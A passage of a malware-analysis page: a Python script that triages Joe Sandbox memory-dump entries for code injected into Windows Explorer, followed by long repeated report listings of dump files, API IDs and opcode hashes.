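        return self.region.is_private_exec() and self.dynamic_resolution


def triage(report_text: str) -> list:
    """Pair each 'Source File' line with the API bullets listed above it."""
    entries, pending = [], []
    for raw in report_text.splitlines():
        line = raw.strip()
        m = API_RE.match(line)
        if m:
            pending.append(m.group(1))
            continue
        m = SRC_RE.match(line)
        if m:
            entries.append(FunctionEntry(parse_sdmp(m.group(1)), int(m.group(2), 16), pending))
            pending = []
    return entries


# Constructed input: entries 1 and 2 copy lines from this report; entry 3 is
# invented (MEM_IMAGE type, i.e. a normally loaded module) to show the negative case.
SAMPLE_REPORT = """\
APIs
• GetProcAddressForCaller.KERNELBASE ref: 00E1998F
• GetProcAddress.KERNEL32 ref: 00E199EE
• LoadLibraryExW.KERNEL32 ref: 00E19A38
Memory Dump Source
• Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
APIs
Memory Dump Source
• Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
APIs
• GetProcAddress.KERNEL32 ref: 7FF800001000
Memory Dump Source
• Source File: 00000010.00000002.0000000001.00007FF800000000.00000020.00001000.01000000.00000000.sdmp, Offset: 7FF800000000, based on PE: true
"""

if __name__ == "__main__":
    for e in triage(SAMPLE_REPORT):
        print(f"pid={e.region.pid} base={e.region.base:#x} private_exec={e.region.is_private_exec()} "
              f"dynamic_resolution={e.dynamic_resolution} suspicious={e.suspicious}")
```

Only the first entry is flagged: it lives in PAGE_EXECUTE_READ, MEM_COMMIT, MEM_PRIVATE memory and calls a resolver, which is exactly what the report's "Injects code into the Windows Explorer" verdict rests on. The second entry shares the region but lists no APIs, and the third is image-backed, so neither trips the rule; a real triage would also cross-check the associated dumps (the readable and writable regions at 0xE38000 to 0xE6C000 in this listing), which the same parser handles.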
APIs
Memory Dump Source
• Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: 972676e2263dc913d8f0aceba4ed3926a994122b1158fd80d1085a60b805af4a
• Instruction ID: 8192b5692cd65de3ce841438c33c8e8030648610f048ab3a836019616b23533f
• Opcode Fuzzy Hash: 972676e2263dc913d8f0aceba4ed3926a994122b1158fd80d1085a60b805af4a
• Instruction Fuzzy Hash: 8EF0ED31608B9186F764DB24F9097DA27B0F364748F506B26C48966260CF7DC5C9C601
APIs
Memory Dump Source
• Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: 97899df86d47d9c0d290823c76a79fd567d6de1076d23b08f7a01fa9945c199d
• Instruction ID: 3f86c8e836d11f2cd1602652ffe6a07baefc2cb201b03cc7f442c4ce76b4db0c
• Opcode Fuzzy Hash: 97899df86d47d9c0d290823c76a79fd567d6de1076d23b08f7a01fa9945c199d
• Instruction Fuzzy Hash: A1F04832D05B81C6F720DBA1F95836326B1E774398F902915D445A66B4CFBD85C4CF44
APIs
Memory Dump Source
• Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: 7bf3fda03488cde0f2424b2de49cc3ea02773bfd36645c5761c3d60d64d8c9f6
• Instruction ID: f97c7641bd65921278268941db110e03733ad2583f9b93635244692219efdc6c
• Opcode Fuzzy Hash: 7bf3fda03488cde0f2424b2de49cc3ea02773bfd36645c5761c3d60d64d8c9f6
• Instruction Fuzzy Hash: 12E0B631685B80E2E724DB20FD197C637B4F3A9388F904925D44DA2672DF7DC2D9CA00
APIs
Memory Dump Source
• Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
Yara matches
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: bd26352a9cb9f43418d3adb89ed1a2b75b0174cf7063cae51a4f923cf6a2674f
• Instruction ID: 06aeae9a39abddd7ac0661cee82a5b791cce952dc1d85676c5b75ba0ce46d62d
• Opcode Fuzzy Hash: bd26352a9cb9f43418d3adb89ed1a2b75b0174cf7063cae51a4f923cf6a2674f
• Instruction Fuzzy Hash: B6D01733629E90CAE6708B05FA44BAAB360F7C0704F506011A6C292908CB38C890CE00
APIs
Memory Dump Source
• Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: b1b7b2e2055f6fa1aef4303f3cbb07f62001011ee5cc0c0af255673b558dbb32
                                                                                                            • Instruction ID: 06aeae9a39abddd7ac0661cee82a5b791cce952dc1d85676c5b75ba0ce46d62d
                                                                                                            • Opcode Fuzzy Hash: b1b7b2e2055f6fa1aef4303f3cbb07f62001011ee5cc0c0af255673b558dbb32
                                                                                                            • Instruction Fuzzy Hash: B6D01733629E90CAE6708B05FA44BAAB360F7C0704F506011A6C292908CB38C890CE00
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: 67bbd1482953c9a039683a81b8c0d8f6b38603526629be0e265f0fd7566734f5
                                                                                                            • Instruction ID: 06aeae9a39abddd7ac0661cee82a5b791cce952dc1d85676c5b75ba0ce46d62d
                                                                                                            • Opcode Fuzzy Hash: 67bbd1482953c9a039683a81b8c0d8f6b38603526629be0e265f0fd7566734f5
                                                                                                            • Instruction Fuzzy Hash: B6D01733629E90CAE6708B05FA44BAAB360F7C0704F506011A6C292908CB38C890CE00
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: 48b5383b38cba486ddfa990dbca9aa2bd6a836a40005c426cf510de7b801e9cc
                                                                                                            • Instruction ID: 2c597c75e68a2e12bdbd147ac25d29dfe90b5bd66ec20352aed8254f52eebad0
                                                                                                            • Opcode Fuzzy Hash: 48b5383b38cba486ddfa990dbca9aa2bd6a836a40005c426cf510de7b801e9cc
                                                                                                            • Instruction Fuzzy Hash: 20D01772619690C7E7748B08F041BAAB360F780744F402021A286A2994CF39D980CE00
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: 46766f59590c43c0cb273360e60c28dcd038db0768a1794d386c2c23107aae88
                                                                                                            • Instruction ID: 2c597c75e68a2e12bdbd147ac25d29dfe90b5bd66ec20352aed8254f52eebad0
                                                                                                            • Opcode Fuzzy Hash: 46766f59590c43c0cb273360e60c28dcd038db0768a1794d386c2c23107aae88
                                                                                                            • Instruction Fuzzy Hash: 20D01772619690C7E7748B08F041BAAB360F780744F402021A286A2994CF39D980CE00
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: fabb388cd174b4009692af883b9a74474a6733f7c92937f47ce5757885f3fb1c
                                                                                                            • Instruction ID: 06aeae9a39abddd7ac0661cee82a5b791cce952dc1d85676c5b75ba0ce46d62d
                                                                                                            • Opcode Fuzzy Hash: fabb388cd174b4009692af883b9a74474a6733f7c92937f47ce5757885f3fb1c
                                                                                                            • Instruction Fuzzy Hash: B6D01733629E90CAE6708B05FA44BAAB360F7C0704F506011A6C292908CB38C890CE00
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: c334c5a706d2358cffd21ca2a89902cb0897f7236b5e31b31bde773446387451
                                                                                                            • Instruction ID: 06aeae9a39abddd7ac0661cee82a5b791cce952dc1d85676c5b75ba0ce46d62d
                                                                                                            • Opcode Fuzzy Hash: c334c5a706d2358cffd21ca2a89902cb0897f7236b5e31b31bde773446387451
                                                                                                            • Instruction Fuzzy Hash: B6D01733629E90CAE6708B05FA44BAAB360F7C0704F506011A6C292908CB38C890CE00
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: 3a1423a10d6c23ad0d70ca8df7085a05a4326c9adc261c3d6554e918dcf8160a
                                                                                                            • Instruction ID: 2c597c75e68a2e12bdbd147ac25d29dfe90b5bd66ec20352aed8254f52eebad0
                                                                                                            • Opcode Fuzzy Hash: 3a1423a10d6c23ad0d70ca8df7085a05a4326c9adc261c3d6554e918dcf8160a
                                                                                                            • Instruction Fuzzy Hash: 20D01772619690C7E7748B08F041BAAB360F780744F402021A286A2994CF39D980CE00
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
Yara matches
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 5cd527b682022ef2e181432df0d08e7952cbdf5ffb770021f4e618f9a49ae03e
• Instruction ID: 2c597c75e68a2e12bdbd147ac25d29dfe90b5bd66ec20352aed8254f52eebad0
• Opcode Fuzzy Hash: 5cd527b682022ef2e181432df0d08e7952cbdf5ffb770021f4e618f9a49ae03e
• Instruction Fuzzy Hash: 20D01772619690C7E7748B08F041BAAB360F780744F402021A286A2994CF39D980CE00
APIs
Memory Dump Source
• Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
Yara matches
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: f9167c6025ceaf99fe249accd0e6505652e1a8aee71905078ff3a5cba5771e6b
• Instruction ID: 2c597c75e68a2e12bdbd147ac25d29dfe90b5bd66ec20352aed8254f52eebad0
• Opcode Fuzzy Hash: f9167c6025ceaf99fe249accd0e6505652e1a8aee71905078ff3a5cba5771e6b
• Instruction Fuzzy Hash: 20D01772619690C7E7748B08F041BAAB360F780744F402021A286A2994CF39D980CE00
APIs
Memory Dump Source
• Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
Yara matches
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 066845098519c5cfd41540883547bc2673087f9916ed1057274385ce232eb9ba
• Instruction ID: 2c597c75e68a2e12bdbd147ac25d29dfe90b5bd66ec20352aed8254f52eebad0
• Opcode Fuzzy Hash: 066845098519c5cfd41540883547bc2673087f9916ed1057274385ce232eb9ba
• Instruction Fuzzy Hash: 20D01772619690C7E7748B08F041BAAB360F780744F402021A286A2994CF39D980CE00
APIs
Memory Dump Source
• Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
Yara matches
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 60cf21f62d1dc145206f08a91dd1bba283ab904a53c73a5ec01a131829a1e1fa
• Instruction ID: 2c597c75e68a2e12bdbd147ac25d29dfe90b5bd66ec20352aed8254f52eebad0
• Opcode Fuzzy Hash: 60cf21f62d1dc145206f08a91dd1bba283ab904a53c73a5ec01a131829a1e1fa
• Instruction Fuzzy Hash: 20D01772619690C7E7748B08F041BAAB360F780744F402021A286A2994CF39D980CE00
APIs
Memory Dump Source
• Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
Yara matches
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: bc4a491e1d895ba903ebd733a6c2b6428fd16bf76896332000bf1874532a21ec
• Instruction ID: 2c597c75e68a2e12bdbd147ac25d29dfe90b5bd66ec20352aed8254f52eebad0
• Opcode Fuzzy Hash: bc4a491e1d895ba903ebd733a6c2b6428fd16bf76896332000bf1874532a21ec
• Instruction Fuzzy Hash: 20D01772619690C7E7748B08F041BAAB360F780744F402021A286A2994CF39D980CE00
APIs
Memory Dump Source
• Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
